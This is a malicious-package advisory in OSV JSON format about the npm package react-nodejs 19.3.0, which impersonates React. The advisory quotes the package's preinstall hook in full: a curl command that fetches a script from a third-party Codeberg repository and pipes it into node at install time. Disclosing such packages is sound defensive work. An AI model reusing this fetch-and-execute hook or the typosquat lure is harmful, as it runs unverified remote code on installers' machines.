{"id":"MAL-2026-17294","summary":"Malicious code in react-nodejs (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (5777ca86863da9fabb9da8e1a0d6c2f30f05533265624b2da07a8d0804930481)\npackage.json declares a preinstall lifecycle hook that runs `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node`, fetching a JavaScript file from an unrelated third-party Codeberg user's repository on a mutable branch (proxied through web.archive.org) and executing it in Node on the installer's machine at `npm install` time. The fetched content is unpinned, unverified, and controlled by an account with no relationship to the React publisher. The package additionally impersonates React: name `react-nodejs`, description copied from React, `homepage` set to https://react.dev/, and `repository` pointing at github.com/react/react.git, while being published by an unrelated author — a typosquat lure amplifying the install-time remote code execution.\n","modified":"2026-09-29T22:45:04.989169586Z","published":"2026-09-29T22:18:52Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-09-29T22:41:05.688026468Z","modified_time":"2026-09-29T22:18:52Z","sha256":"5777ca86863da9fabb9da8e1a0d6c2f30f05533265624b2da07a8d0804930481","source":"amazon-inspector","versions":["19.3.0"],"id":"IN-MAL-2026-020688"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/react-nodejs/v/19.3.0"}],"affected":[{"package":{"name":"react-nodejs","ecosystem":"npm","purl":"pkg:npm/react-nodejs"},"versions":["19.3.0"],"database_specific":{"indicators":{"package_integrity":[{"hashes":{"sha1":"030d07792f9dc3f792a2112fc1ab24d2b43a7a29","sha512_sri":"sha512-ATi8XqGT+kcozEl79pCL+ZH5bTfr2+6OeEzB3k/KScvbn9ZGduLcuP819loUvnheFux8uocdLx0Uvox69Ijcpw=="},"filename":"react-nodejs-19.3.0.tgz"}],"evidence_files":[{"path":"package.json","sha256":"4ce8de223918656f7d92d0d51f7ecb32334d848189225e96e871d43e452fa3c7","tlsh":"43210919cda48cb31ad56b9a6c3a1186a31d545f0c493e4cb78a842e5f4d0df50fb21c"}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-nodejs/MAL-2026-17294.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}